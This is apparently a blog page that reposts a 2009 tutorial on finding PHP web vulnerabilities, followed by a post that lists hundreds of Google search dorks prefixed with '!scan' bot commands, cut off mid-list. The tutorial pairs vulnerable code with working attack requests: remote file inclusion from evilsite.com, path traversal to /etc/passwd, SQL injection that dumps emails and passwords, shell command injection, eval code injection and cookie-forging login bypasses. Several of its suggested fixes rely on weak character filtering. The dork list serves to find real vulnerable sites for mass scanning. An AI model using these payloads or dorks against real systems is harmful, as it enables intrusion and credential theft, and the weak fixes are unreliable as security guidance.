Selasa, 20 April 2010
di
10.56
|
Name : Finding vulnerabilities in PHP scripts FULL ( with examples )
Author : SirGod
Email : sirgod08@gmail.com
Contents :
1) About
2) Some stuff
3) Remote File Inclusion
3.0 - Basic example
3.1 - Simple example
3.2 - How to fix
4) Local File Inclusion
4.0 - Basic example
4.1 - Simple example
4.2 - How to fix
5) Local File Disclosure/Download
5.0 - Basic example
5.1 - Simple example
5.2 - How to fix
6) SQL Injection
6.0 - Basic example
6.1 - Simple example
6.2 - SQL Login Bypass
6.3 - How to fix
7) Insecure Cookie Handling
7.0 - Basic example
7.1 - Simple example
7.2 - How to fix
8) Remote Command Execution
8.0 - Basic example
8.1 - Simple example
8.2 - Advanced example
8.3 - How to fix
9) Remote Code Execution
9.0 - Basic example
9.1 - Simple example
9.2 - How to fix
10) Cross-Site Scripting
10.0 - Basic example
10.1 - Another example
10.2 - Simple example
10.3 - How to fix
11) Authentication Bypass
11.0 - Basic example
11.1 - Via login variable
11.2 - Unprotected Admin CP
11.3 - How to fix
12) Insecure Permissions
12.0 - Basic example
12.1 - Read the users/passwords
12.2 - Download backups
12.3 - INC files
12.4 - How to fix
13) Cross Site Request Forgery
13.0 - Basic example
13.1 - Simple example
13.2 - How to fix
14) Shoutz
1) In this tutorial I will show you how you can find vulnerabilities in php scripts.I will not explain
how to exploit the vulnerabilities,it is pretty easy and you can find info around the web.All the
examples without the basic example of each category was founded in different scripts.
2) First,install Apache,PHP and MySQL on your computer.Addionally you can install phpMyAdmin.
You can install WAMP server for example,it has all in one..Most vulnerabilities need special conditions
to work.So you will need to set up properly the PHP configuration file (php.ini) .I will show you what
configuration I use and why :
safe_mode = off ( a lot of shit cannot be done with this on )
disabled_functions = N/A ( no one,we want all )
register_globals = on ( we can set variables by request )
allow_url_include = on ( for lfi/rfi )
allow_url_fopen = on ( for lfi/rfi )
magic_quotes_gpc = off ( this will escape ' " \ and NUL's with a backslash and we don't want that )
short_tag_open = on ( some scripts are using short tags,better on )
file_uploads = on ( we want to upload )
display_errors = on ( we want to see the script errors,maybe some undeclared variables? )
How to proceed : First,create a database to be used by different scripts.Install the script on
localhost and start the audit over the source code.If you found something open the web browser and
test it,maybe you are wrong.
3) Remote File Inclusion
- Tips : You can use the NULLBYTE and ? trick.
You can use HTTPS and FTP to bypass filters ( http filtered )
In PHP is 4 functions through you can include code.
require - require() is identical to include() except upon failure it will produce a fatal E_ERROR level error.
require_once - is identical to require() except PHP will check if the file has already been included, and if so, not include (require) it again.
include - includes and evaluates the specified file.
include_once - includes and evaluates the specified file during the execution of the script.
3.0 - Basic example
- Tips : some scripts don't accept "http" in variables,"http" word is forbbiden so
you can use "https" or "ftp".
- Code snippet from test.php
-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina;
?>
-----------------------------------------------
- If we access the page we got some errors and some warnings( not pasted ) :
Notice: Undefined index: pagina in C:\wamp\www\test.php on line 2
- We can see here that "pagina" variable is undeclared.We can set any value to "pagina" variable.Example :
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
Now I will show why some people use ? and %00 after the link to the evil script.
# The "%00"
- Code snippet from test.php
-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina.'.php';
?>
-----------------------------------------------
- So if we will request
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt
Will not work because the script will try to include http://evilsite.com/evilscript.txt.php
So we will add a NULLBYTE ( %00 ) and all the shit after nullbyte will not be taken in
consideration.Example :
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt%00
The script will successfully include our evilscript and will throw to junk the things
after the nullbyte.
# The "?"
- Code snippet from test.php
-----------------------------------------------
$pagina=$_GET['pagina'];
include $pagina.'logged=1';
?>
-----------------------------------------------
And the logged=1 will become like a variable.But better use nullbyte.Example :
http://127.0.0.1/test.php?pagina=http://evilsite.com/evilscript.txt?logged=1
The evilscript will be included succesfully.
3.1 - Simple example
Now an example from a script.
- Code snippet from index.php
----------------------------------------------------
if (isset($_REQUEST["main_content"])){
$main_content = $_REQUEST["main_content"];
} else if (isset($_SESSION["main_content"])){
$main_content = $_SESSION["main_content"];
}
.......................etc..................
ob_start();
require_once($main_content);
----------------------------------------------------
We can see that "main_content" variable is requested by $_REQUEST method.The attacker can
set any value that he want. Below the "main_content" variable is include.So if we make the
following request :
http://127.0.0.1/index.php?main_content=http://evilsite.com/evilscript.txt
Our evil script will be successfully included.
3.2 - How to fix
Simple way : Don't allow special chars in variables.Simple way : filter the slash "/" .
Another way : filter "http" , "https" , "ftp" and "smb".
4) Local File Inclusion
- Tips : You can use the NULLBYTE and ? trick.
../ mean a directory up
On Windows systems we can use "..\" instead of "../" .The "..\" will become "..%5C" ( urlencoded ).
The same functions which let you to include (include,include_once,require,require_once) .
4.0 - Basic example
- Code snippet from test.php
-----------------------------------
$pagina=$_GET['pagina'];
include '/pages/'.$pagina;
?>
-----------------------------------
Now,we can not include our script because we can not include remote files.We can include only
local files as you see.So if we make the following request :
http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd
The script will include "/pages/../../../../../../etc/passwd" successfully.
You can use the %00 and ? .The same story.
4.1 - Simple example
- Code snippet from install/install.php
-------------------------------------
if(empty($_GET["url"]))
$url = 'step_welcome.php';
else
$url = $_GET["url"];
.............etc.............
-------------------------------------
We can see that "url" variable is injectable.If the "url" variable is not set
(is empty) the script will include "step_welcome.php" else will include the
variable set by the attacker.
So if we do the following request :
http://127.0.0.1/install/install.php?url=../../../../../../etc/passwd
The "etc/passwd" file will be succesfully included.
4.2 - How to fix
Simple way : Don't allow special chars in variables.Simple way : filter the dot "."
Another way : Filter "/" , "\" and "." .
5) Local File Disclosure/Download
- Tips : Through this vulnerability you can read the content of files,not include.
Some functions which let you to read files :
file_get_contents — Reads entire file into a string
readfile — Outputs a file
file — Reads entire file into an array
fopen — Opens file or URL
highlight_file — Syntax highlighting of a file.Prints out or returns a syntax
highlighted version of the code contained in filename using the
colors defined in the built-in syntax highlighter for PHP.
show_source — Alias of highlight_file()
5.0 - Basic example
- Code snippet from test.php
--------------------------------------
$pagina=$_GET['pagina'];
readfile($pagina);
?>
--------------------------------------
The readfile() function will read the content of the specified file.So if we do the following request :
http://127.0.0.1/test.php?pagina=../../../../../../etc/passwd
The content of etc/passwd will be outputed NOT included.
5.1 - Simple example
- Code snippet from download.php
-----------------------------------------------------------------------------------
$file = $_SERVER["DOCUMENT_ROOT"]. $_REQUEST['file'];
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Content-Type: application/force-download");
header( "Content-Disposition: attachment; filename=".basename($file));
//header( "Content-Description: File Transfer");
@readfile($file);
die();
-----------------------------------------------------------------------------------
The "file" variable is unsecure.We see in first line that it is requested by $_REQUEST method.
And the file is disclosed by readfile() function.So we can see the content of an arbitrary file.
If we make the following request :
http://127.0.0.1/download.php?file=../../../../../../etc/passwd
So we can succesfully read the "etc/passwd" file.
5.2 - How to fix
Simple way : Don't allow special chars in variables.Simple way : filter the dot "."
Another way : Filter "/" , "\" and "." .
6) SQL Injection
- Tips : If the user have file privileges you can read files.
If the user have file privileges and you find a writable directory and magic_quotes_gpc = off
you can upload you code into a file.
6.0 - Basic example
- Code snippet from test.php
----------------------------------------------------------------------------------
$id = $_GET['id'];
$result = mysql_query( "SELECT name FROM members WHERE id = '$id'");
?>
----------------------------------------------------------------------------------
The "id" variable is not filtered.We can inject our SQL code in "id" variable.Example :
http://127.0.0.1/test.php?id=1+union+all+select+1,null,load_file('etc/passwd'),4--
And we get the "etc/passwd" file if magic_quotes = off ( escaping ' ) and users have
file privileges.
6.1 - Simple example
- Code snippet from house/listing_view.php
-----------------------------------------------------------------------------------------------------------------------------
$id = $_GET['itemnr'];
require_once($home."mysqlinfo.php");
$query = "SELECT title, type, price, bedrooms, distance, address, phone, comments, handle, image from Rentals where id=$id";
$result = mysql_query($query);
if(mysql_num_rows($result)){
$r = mysql_fetch_array($result);
-----------------------------------------------------------------------------------------------------------------------------
We see that "id" variable value is the value set for "itemnr" and is not filtered in any way.
So we can inject our code.Lets make a request :
http://127.0.0.1/house/listing_view.php?itemnr=null+union+all+select+1,2,3,concat(0x3a,email,password),5,6,7,8,9,10+from+users--
And we get the email and the password from the users table.
6.2 - SQL Injection Login Bypass
- Code snippet from /admin/login.php
------------------------------------------------------------------------------------------------------------------------------
$postbruger = $_POST['username'];
$postpass = md5($_POST['password']);
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = '$postbruger' AND password = '$postpass'")
or die("" . mysql_error() . " \n");
------------------------------------------------------------------------------------------------------------------------------
The variables isn't properly checked.We can bypass this login.Lets inject the following username and password :
username : admin ' or ' 1=1
password : sirgod
We logged in.Why?Look,the code will become
---------------------------------------------------------------------------------------------------------------------------------
$resultat = mysql_query("SELECT * FROM " . $tablestart . "login WHERE brugernavn = 'admin' ' or ' 1=1 AND password = 'sirgod'")
---------------------------------------------------------------------------------------------------------------------------------
Login bypassed.The username must be an existent username.
6.3 - How to fix
Simple way : Don't allow special chars in variables.For numeric variables
use (int) ,example $id=(int)$_GET['id'];
Another way : For non-numeric variables : filter all special chars used in
SQLI : - , . ( ) ' " _ + / *
7) Insecure Cooke Handling
- Tips : Write the code in the URLbar,don't use a cookie editor for this.
7.0 - Basic example
- Code snippet from test.php
---------------------------------------------------------------
if($_POST['password'] == $thepass) {
setcookie("is_user_logged","1");
} else { die("Login failed!"); }
............ etc .................
if($_COOKIE['is_user_logged']=="1")
{ include "admin.php"; else { die('not logged'); }
---------------------------------------------------------------
Something interesting here.If we set to the "is_user_logged" variable
from cookie value "1" we are logged in.Example :
javascript:document.cookie = "is_user_logged=1; path=/";
So practically we are logged in,we pass the check and we can access the admin panel.
7.1 - Simple example
- Code snippet from admin.php
----------------------------------------------------------------
if ($_COOKIE[PHPMYBCAdmin] == '') {
if (!$_POST[login] == 'login') {
die("Please Login:
");
} elseif($_POST[password] == $bcadminpass) {
setcookie("PHPMYBCAdmin","LOGGEDIN", time() + 60 * 60);
header("Location: admin.php"); } else { die("Incorrect"); }
}
----------------------------------------------------------------
Code looks exploitable.We can set a cookie value that let us to bypass the login
and tell to the script that we are already logged in.Example :
javascript:document.cookie = "PHPMYBCAdmin=LOGGEDIN; path=/";document.cookie = "1246371700; path=/";
What is 1246371700? Is the current time() echo'ed + 360.
7.2 - How to fix
Simple way : The most simple and eficient way : use SESSIONS .
8) Remote Command Execution
- Tips : If in script is used exec() you can't see the command output(but the command is executed)
until the result isn't echo'ed from script.
You can use AND operator ( || ) if the script execute more than one command .
In PHP are some functions that let you to execute commands :
exec — Execute an external program
passthru — Execute an external program and display raw output
shell_exec — Execute command via shell and return the complete output as a string
system — Execute an external program and display the output
8.0 - Basic example
- Code snippet from test.php
---------------------------------
$cmd=$_GET['cmd'];
system($cmd);
?>
---------------------------------
So if we make the following request :
http://127.0.0.1/test.php?cmd=whoami
The command will be executed and the result will be outputed.
8.1 - Simple example
- Code snippet from dig.php
-------------------------------------------------------------------------------------------
$status = $_GET['status'];
$ns = $_GET['ns'];
$host = $_GET['host'];
$query_type = $_GET['query_type']; // ANY, MX, A , etc.
$ip = $_SERVER['REMOTE_ADDR'];
$self = $_SERVER['PHP_SELF'];
........................ etc ........................
$host = trim($host);
$host = strtolower($host);
echo("Executing : dig @$ns $host $query_type ");
echo '';
system ("dig @$ns $host $query_type");
-------------------------------------------------------------------------------------------
The "ns" variable is unfiltered and can be specified by the attacker.An attacker can use any command
that he want through this variable.
Lets make a request :
http://127.0.0.1/dig.php?ns=whoam&host=sirgod.net&query_type=NS&status=digging
The injection will fail.Why?The executed command will be : dig whoami sirgod.com NS and
will not work of course.Lets do something a little bit tricky.We have the AND operator
( || ) and we will use it to separe the commands.Example :
http://127.0.0.1/dig.php?ns=||whoami||&host=sirgod.net&query_type=NS&status=digging
Our command will be executed.The command become "dig ||whoami|| sirgod.net NS".
8.2 - Advanced example
- Code snippet from add_reg.php
-------------------------------------------------------
$user = $_POST['user'];
$pass1 = $_POST['pass1'];
$pass2 = $_POST['pass2'];
$email1 = $_POST['email1'];
$email2 = $_POST['email2'];
$location = $_POST['location'];
$url = $_POST['url'];
$filename = "./sites/".$user.".php";
...................etc......................
$html = " \$regdate = \"$date\";
\$user = \"$user\";
\$pass = \"$pass1\";
\$email = \"$email1\";
\$location = \"$location\";
\$url = \"$url\";
?>";
$fp = fopen($filename, 'a+');
fputs($fp, $html) or die("Could not open file!");
-------------------------------------------------------
We can see that the script creates a php file in "sites" directory( ourusername.php ).
The script save all the user data in that file so we can inject our evil code into one
field,I choose the "location" variable.
So if we register as an user with the location (set the "location" value) :
the code inside sites/ourusername.php will become :
-------------------------------------------------
$regdate = "13 June 2009, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";
$url = "http://google.ro";
?>
-------------------------------------------------
So we will get an parse error.Not good.We must inject a proper code to get the result that we want.
Lets inject this code :
\";?>
So the code inside sites/ourusername.php will become :
--------------------------------------------------------------
$regdate = "13 June 2009, 4:16 PM";
$user = "pwned";
$pass = "pwned";
$email = "pwned@yahoo.com";
$location = "";?> $url = "http://google.ro";
?>
--------------------------------------------------------------
and we will have no error.Why?See the code :
$location = "";?>
Lets split it :
-------------------------------
$location = "";
?>
-------------------------------
We set the location value to "",close the first php tags,open the tags
again,wrote our evil code,close the tags and open other and add a variable
"xxx" because we dont want any error.I wrote that code because I want no
error,can be modified to be small but will give some errors(will not
stop us to execute commands but looks ugly).
So if we make the following request :
http://127.0.0.1/sites/ourusername.php?cmd=whoami
And our command will be succesfully executed.
8.3 - How to fix
Simple way : Don't allow user input .
Another way : Use escapeshellarg() and escapeshellcmd() functions .
Example : $cmd=escapeshellarg($_GET'cmd']);
9) Remote Code Execution
- Tips : You must inject valid PHP code including terminating statements ( ; ) .
9.0 - Basic example
- Code snippet from test.php
-----------------------------------
$code=$_GET['code'];
eval($code);
?>
-----------------------------------
The "eval" function evaluate a string as PHP code.So in this case we are able to execute
our PHP code.Examples :
http://127.0.0.1/test.php?code=phpinfo();
http://127.0.0.1/test.php?code=system(whoami);
And we will see the output of the PHP code injected by us.
9.1 - Simple example
- Code snippet from system/services/init.php
------------------------------------------------
$conf = array_merge($conf,$confweb);
}
@eval(stripslashes($_REQUEST['anticode']));
if ( $_SERVER['HTTP_CLIENT_IP'] )
------------------------------------------------
We see that the "anticode" is requested by $_REQUEST method and the coder
"secured" the input with "stripslashes" which is useless here,we don't need
slashes to execute our php code only if we want to include a URL.So we can
inject our PHP code.Example :
http://127.0.0.1/test.php?anticode=phpinfo();
Great,injection done,phpinfo() result printed.No include because slashes are
removed,but we can use system() or another function to execute commands.
9.2 - How to fix
Simple way : Don't allow ";" and the PHP code will be invalid.
Another way : Don't allow any special char like "(" or ")" etc.
10) Cross-Site Scripting
- Tips : You can use alot of vectors,can try alot of bypass methods,you cand
find them around the web.
10.0 - Basic example
- Code snippet from test.php
---------------------------------
$name=$_GET['name'];
print $name;
?>
---------------------------------
The input is not filtered,an attacker can inject JavaScript code.Example :
http://127.0.0.1/test.php?name=
A popup with XSS message will be displayed.JavaScript code succesfully executed.
10.1 - Another example
- Code snippet from test.php
-------------------------------------------
$name=addslashes($_GET['name']);
print ' ';
?>
-------------------------------------------
Not an advanced example,only a bit complicated.
http://127.0.0.1/test.php?name=">
Why this vector?We put " because we must close the " from the "name" atribut
of the "table" tag and > to close the "table" tag.Why String.fromCharCode?Because
we want to bypass addslashes() function.Injection done.
10.2 - Simple example
- Code snippet from modules.php
---------------------------------------------------------------------------
if (isset($name)) {
.................... etc................
} else {
die("Le fichier modules/".$name."/".$mod_file.".php est inexistant");
---------------------------------------------------------------------------
The "name" variable is injectable,input is not filtered,so we can inject
with ease JavaScript code.Example :
http://127.0.0.1/test.php?name=
10.3 - How to fix
Simple way : Use htmlentities() or htmlspecialchars() functions.
Example : $name=htmlentities($_GET['name']);
Another way : Filter all special chars used for XSS ( a lot ).
The best way is the first method.
11) Authentication Bypass
- Tips : Look deep in the scripts,look in the admin directories,
maybe are not protected,also look for undefined variables
like "login" or "auth".
11.0 - Basic example
I will provide a simple example of authentication bypass
via login variable.
- Code snippet from test.php
---------------------------------
if ($logged==true) {
echo 'Logged in.'; }
else {
print 'Not logged in.';
}
?>
---------------------------------
Here we need register_gloabals = on . I will talk about php.ini
settings a bit later in this tutorial.If we set the value of $logged
variable to 1 the if condition will be true and we are logged in.
Example :
http://127.0.0.1/test/php?logged=1
And we are logged in.
11.1 - Via login variable
- Code snippet from login.php
------------------------------------------------------------------------------------
if ($login_ok)
{
$_SESSION['loggato'] = true;
echo "$txt_pass_ok ";
echo"";
}
------------------------------------------------------------------------------------
Lets see.If the "login_ok" variable is TRUE ( 1 ) the script set us a SESSION who
tell to the script that we are logged in.So lets set the "login_ok" variable to TRUE.
Example :
http://127.0.0.1/login.php?login_ok=1
Now we are logged in.
11.2 - Unprotected Admin CP
You couln't belive this but some PHP scrips don't protect the admin
control panel : no login,no .htaccess,nothing.So we simply we go to
the admin panel directory and we take the control of the website.
Example :
http://127.0.0.1/admin/files.php
We accessed the admin panel with a simple request.
11.3 - How to fix
- Login variable bypass : Use a REAL authentication system,don't check the
login like that,use SESSION verification.Example :
if($_SESSION['logged']==1) {
echo 'Logged in'; }
else { echo 'Not logged in';
}
- Unprotected Admin CP : Use an authentication system or use .htaccess to
allow access from specific IP's or .htpasswd to
request an username and a password for admin CP.
Example :
.htaccess :
order deny, allow
deny from all
allow from 127.0.0.1
.htpasswd :
AuthUserFile /the/path/.htpasswd
AuthType Basic
AuthName "Admin CP"
Require valid-user
and /the/path/.htpasswd
sirgod:$apr1$wSt1u...$6yvagxWk.Ai2bD6s6O9iQ.
12) Insecure Permissions
Tips : Look deep into the files,look if the script request to be
logged in to do something,maybe the script don't request.
Watch out for insecure permissions,maybe you can do admin
things without login.
12.0 - Basic example
We are thinking at a script who let the admin to have a lookup in
the users database through a file placed in /admin directory.That
file is named...hmmm : db_lookup.php.
- Code snippet from admin/db_lookup.php
--------------------------------------------
// Lookup in the database
readfile('protected/usersdb.txt');
?>
--------------------------------------------
Lets think.We cannot access the "protected" directory because
is .htaccess'ed.But look at this file,no logged-in check,nothing.
So if we acces :
http://127.0.0.1/admin/db_lookup.php
We can see the database.Remember,this is only an example created by
me,not a real one,you can find this kind of vulnerabilities in scripts.
12.1 - Read the users/passwords
Oh yeah,some coders are so stupid.They save the usernames and passwords
in text files,UNPROTECTED.A simple example from a script :
http://127.0.0.1/userpwd.txt
And we read the file,the usernames and passwords are there.
12.2 - Download Backups
Some scripts have database backup functions,some are safe,some are not safe.
I will show you a real script example :
- Code snippet from /adminpanel/phpmydump.php
--------------------------------------------------------------------------------
function mysqlbackup($host,$dbname, $uid, $pwd, $structure_only, $crlf) {
$con=@mysql_connect("localhost",$uid, $pwd) or die("Could not connect");
$db=@mysql_select_db($dbname,$con) or die("Could not select db");
.............................. etc ..........................
mysqlbackup($host,$dbname,$uname,$upass,$structure_only,$crlf);
--------------------------------------------------------------------------------
After a lof of code the function is called.I don't pasted the entire code
because is huge.I analyzed the script,no login required,no check,nothing.So
if we access the file directly the download of the backup will start.Example :
http://127.0.0.1/adminpanel/phpmydump.php
Now we have the database backup saved in our computer.
12.3 - INC files
Some scripts saves important data in INC files.Usually in INC files is PHP
code containing database configuration.The INC files can be viewed in
browser even they contain PHP code.So a simple request will be enough to
access and read the file.Example :
http://127.0.0.1/inc/mysql.inc
Now we have the database connection details.Look deep in scripts,is more
scripts who saves important data into INC files.
12.4 - How to fix
- Basic example : Check if the admin is logged in,if not,redirect.
- Read the users/passwords : Save the records in a MySQL database
or in a protected file/directory.
- Download Backups : Check if the admin is logged in,if not,redirect.
- INC files : Save the configuration in proper files,like .php or
protect the directory with an .htaccess file.
13) Cross Site Request Forgery
- Tips : Through CSRF you can change the admin password,is not
so inofensive.
Can be used with XSS,redirected from XSS.
13.0 - Basic example
- Code snippet from test.php
-----------------------------------------
check_auth();
if(isset($_GET['news']))
{ unlink('files/news'.$news.'.txt'); }
else {
die('File not deleted'); }
?>
-----------------------------------------
In this example you will see what is CSRF and how it works.In the "files"
directory are saved the news written by the author.The news are saved like
"news1.txt","news2.txt" etc. So the admin can delete the news.The news that
he want to delete will be specified in "news" variable.If he want to delete
the news1.txt the value of "news" will be "1".We cannot execute this without
admin permissions,look,the script check if we are logged in.
I will show you an example.If we request :
http://127.0.0.1/test.php?news=1
The /news/news1.txt file will be deleted.The script directly delete the file
without any notice.So we can use this to delete a file.All we need is to trick
the admin to click our evil link and the file specified by us in the "news"
variable will be deleted.
13.1 - Simple example
In a way the codes below are included in the index.php file ,I
will not paste all the includes,there are a lot.
- Code snippet from includes/pages/admin.php
--------------------------------------------------------------------
if ($_GET['act'] == '') {
include "includes/pages/admin/home.php";
} else {
include "includes/pages/admin/" . $_GET['act'] . ".php";
--------------------------------------------------------------------
Here we can see how the "includes/pages/admin/members.php" is included in
this file.If "act=members" the file below will be included.
- Code snippet from includes/pages/admin/members.php
----------------------------------------------------------------------------------------------
if ($_GET['func'] == 'delete') {
$del_id = $_GET['id'];
$query2121 = "select ROLE from {$db_prefix}members WHERE ID='$del_id'";
$result2121 = mysql_query($query2121) or die("delete.php - Error in query: $query2121");
while ($results2121 = mysql_fetch_array($result2121)) {
$their_role = $results2121['ROLE'];
}
if ($their_role != '1') {
mysql_query("DELETE FROM {$db_prefix}members WHERE id='$del_id'") or die(mysql_error
());
----------------------------------------------------------------------------------------------
We can see here that if "func=delete" will be called by URL,the script will
delete from the database a user with the specified ID ( $id ) without any
confirmation.Example :
http://127.0.0.1/index.php?page=admin&act=members&func=delete&id=4
The script check if the admin is logged in so if we trick the admin to click
our evil link the user who have the specified ID in the database will be deleted
without any confirmation.
13.2 - How to fix
- Simple way : Use tokens.At each login,generate a random token and save it
in the session.Request the token in URL to do administrative
actions,if the token missing or is wrong,don't execute the
action.I will show you only how to to check if the token
is present and is correct.Example :
-------------------------------------------------------
check_auth();
if(isset($_GET['news']) && $token=$_SESSION['token'])
{ unlink('files/news'.$news.'.txt'); }
else {
die('Error.'); }
?>
-------------------------------------------------------
The request will look like this one :
http://127.0.0.1/index.php?delete=1&token=[RANDOM_TOKEN]
So this request will be fine,the news will be deleted.
- Another way : Do some complicated confirmations or request a password
to do administrative actions.
14) Shoutz
Shoutz to all www.insecurity.ro & www.h4cky0u.org members.If you have some suggestions or
questions just email me.
sources : http://milw0rm.com/papers/381
# milw0rm.com [2009-09-09]
Read More..
Diposting oleh
Jericho PS
Jumat, 07 Agustus 2009
di
10.25
|
duhh dah lama ga nulis. maen-maen juga ya ke http://jericho.at.ua
Read More..
Diposting oleh
Jericho PS
Jumat, 01 Mei 2009
di
04.52
|
Beberapa SQL injection dork:
!scan side.php?arq= allinurl:.php?arq= !scan side.php?table= allinurl:.php?table= !scan side.php?vis= allinurl:.php?vis= !scan side.php?vis= allinurl:side.php?vis= !scan site.php?arq= allinurl:.php?arq= !scan site.php?meio= allinurl:.php?meio= !scan site.php?table= allinurl:.php?table= !scan s.php?table= allinurl:.php?table= !scan start.php?id= allinurl:".php?id=" !scan start.php?id= allinurl:"start.php?id=" !scan start.php?id= allinurl:start.php?id= !scan start.php?lang= allinurl:".php?lang=" !scan start.php?lang= allinurl:"start.php?lang=" !scan start.php?lang= allinurl:start.php?lang= !scan start.php?lang= .php?lang= !scan start.php?lang= start.php?lang= !scan start.php?mod= allinurl:".php?mod=" !scan start.php?mod= allinurl:"start.php?mod=" !scan start.php?page= allinurl:".php?page=" !scan start.php?page= allinurl:"start.php?page=" !scan start.php?page= start.php?page= !scan start.php?pag= start.php?pag= !scan start.php?pg= start.php?pg= !scan start.php?p= start.php?p= !scan start.php?s= allinurl:".php?s=" !scan start.php?s= allinurl:"start.php?s=" !scan start.php?s= allinurl:start.php?s= !scan start.php?s= start.php?s= !scan str.php?lang= str.php?lang= !scan str.php?ln= str.php?ln= !scan str.php?l= str.php?l= !scan str.php?page= str.php?page= !scan str.php?p= str.php?p= !scan sub.php?menu= "sub.php?menu=" !scan sub.php?menu= sub.php?menu= !scan sub.php?s= "sub.php?s=" !scan sub.php?s= sub.php?s= !scan sub.php?sub= "sub.php?sub=" !scan sub.php?sub= sub.php?sub= !scan task.php?task= allinurl:.php?task= !scan task.php?task= allinurl:task.php?task= !scan /templates/mangobery/footer.sample.php?Site_Path= Mangobery !scan /templates/mangobery/footer.sample.php?Site_Path= Mangobery 0.5.5 !scan /templates/mangobery/footer.sample.php?Site_Path= Mangobery-0.5.5 !scan trans.php?trans= allinurl:".php?trans=" !scan trans.php?trans= allinurl:"trans.php?trans=" !scan /trans/trans.php?trans=eng&page= allinurl:".php?trans=" !scan /trans/trans.php?trans=en&page= allinurl:".php?trans=" !scan /trans/trans.php?trans=fr&page= allinurl:".php?trans=" !scan /trans/trans.php?trans=ko&page= allinurl:".php?trans=" !scan /trans/trans.php?trans=&page= allinurl:".php?trans=" !scan /trans/trans.php?trans=&p= allinurl:".php?trans=" !scan view.php?sub= "view.php?sub=" !scan view.php?sub= view.php?sub= !scan view.php?table= allinurl:.php?table= !scan voir.php?inc= allinurl:".php?adid=" !scan werbungFrame.php?do= allinurl:".php?do=" !scan /ws/get_events.php?includedir= "WebCalendar" !scan /ws/get_events.php?includedir= Web Calendar !scan /ws/get_events.php?includedir= WebCalendar !scan /ws/get_events.php?includedir= WebCalendar v0.9.45 !scan /ws/get_reminders.php?includedir= WebCalendar !scan /ws/get_reminders.php?includedir= WebCalendar v0.9.45 !scan /ws/login.php?includedir= WebCalendar !scan /ws/login.php?includedir= WebCalendar v0.9.45 !scan ocp-103/index.php?req_path= ocPortal !scan images/evil.php?owned= e107 !scan index.php?ver= allinurl:.php?ver= !scan index.php?ver= allinurl:".php?ver=" !scan index.php?ver= .php?ver= !scan /index.php?vis= allinurl:/index.php?vis= !scan /index.php?vis= allinurl:.php?vis= !scan index.php?way= index.php?way= !scan index.php?way= .php?way= !scan index.php?wpage= allinurl:"index.php?wpage=" !scan index.php?wpage= allinurl:".php?wpage=" !scan info.php?ln= allinurl:"info.php?ln=" !scan info.php?ln= allinurl:info.php?ln= !scan info.php?ln= allinurl:".php?ln=" !scan /interna.php?meio= allinurl:".php?meio=" !scan kalender.php?vis= allinurl:"kalender.php" !scan kalender.php?vis= allinurl:"kalender.php?vis=" !scan kalender.php?vis= allinurl:".php?vis=" !scan lang.php?arg= allinurl:.php?arg= !scan lang.php?arq= allinurl:.php?arq= !scan lang.php?lk= allinurl:".php?lk=" !scan lang.php?ln= allinurl:.php?ln= !scan lang.php?subpage= allinurl:".php?subpage=" !scan lang.php?subp= allinurl:".php?sub=" !scan lang.php?subp= allinurl:".php?subp=" !scan /lib/db/ez_sql.php?lib_path= ttCMS !scan /lib/db/ez_sql.php?lib_path= ttCMS <= v4 !scan /lib/static/header.php?set_menu= iPhoto Album !scan /lib/static/header.php?set_menu= iPhotoAlbum !scan /lib/static/header.php?set_menu= iPhotoAlbum v1.1 !scan link.php?do= allinurl:".php?do=" !scan list.php?product= allinurl:.php?product= !scan list.php?table= allinurl:.php?table= !scan ln.php?ln= allinurl:.php?ln= !scan loc.php?l= allinurl:".php?l=" !scan loc.php?l= allinurl:".php?loc=" !scan loc.php?lang= allinurl:".php?lang=" !scan loc.php?lang= allinurl:".php?loc=" !scan loc.php?loc= allinurl:"loc.php?loc=" !scan loc.php?loc= allinurl:".php?loc=" !scan login.php?loca= .php?loca= !scan magazine.php?inc= allinurl:".php?inc=" !scan main1.php?arg= allinurl:.php?arg= !scan main1.php?ln= allinurl:.php?ln= !scan main2.php?ln= allinurl:.php?ln= !scan main.html.php?seite= allinurl:.php?seite= !scan main.php3?act= allinurl:"main.php3?act=" !scan main.php3?act= allinurl:".php3?act=" !scan main.php5?page= .php5?id= !scan main.php?a= allinurl:".php?a=" !scan main.php?arg= allinurl:.php?arg= !scan main.php?ba= allinurl:"main.php?ba=" !scan main.php?ba= allinurl:".php?ba=" !scan main.php?command= allinurl:"main.php?command=" !scan main.php?command= allinurl:".php?command=" !scan main.php?d1= allinurl:"main.php?d1=" !scan main.php?d1= allinurl:".php?d1=" !scan main.php?f1= allinurl:".php?f1=" !scan main.php?fset= allinurl:".php?fset=" !scan main.php?id= inurl:"main.php?id=*.php" !scan main.php?inc= allinurl:".php?inc=" !scan main.php?ln= allinurl:.php?ln= !scan main.php?ltr= allinurl:".php?ltr=" !scan main.php?s= allinurl:"main.php?s=" !scan main.php?s= allinurl:main.php?s= !scan main.php?s= allinurl:.php?s= !scan main.php?s= allinurl:".php?s=" !scan main.php?sit= allinurl:".php?sit=" !scan main.php?table= allinurl:.php?table= !scan main.php?vis= allinurl:"main.php?vis=" !scan main.php?vis= allinurl:main.php?vis= !scan main.php?vis= allinurl:".php?vis=" !scan mai.php?act= allinurl:"mai.php?act=" !scan mai.php?act= allinurl:mai.php?act= !scan mai.php?loc= allinurl:"mai.php?loc=" !scan mai.php?loc= allinurl:mai.php?loc= !scan mai.php?src= allinurl:"mai.php?src=" !scan mai.php?src= allinurl:mai.php?src= !scan map.php?loc= map.php?loc= !scan middle.php?file= inurl:"middle.php?file=" !scan middle.php?file= inurl:"middle.php?page=" !scan middle.php?file= inurl:".php?file=" !scan middle.php?file= inurl:".php?page=" !scan middle.php?file= middle.php?file= !scan middle.php?file= middle.php?page= !scan middle.php?file= .php?file= !scan middle.php?file= .php?page= !scan middle.php?page= inurl:"middle.php?page=" !scan middle.php?page= inurl:".php?page=" !scan middle.php?page= middle.php?page= !scan middle.php?page= .php?page= !scan misc.php?do= allinurl:".php?do=" !scan mod.php?mod= allinurl:"mod.php?mod=" !scan mod.php?mod= 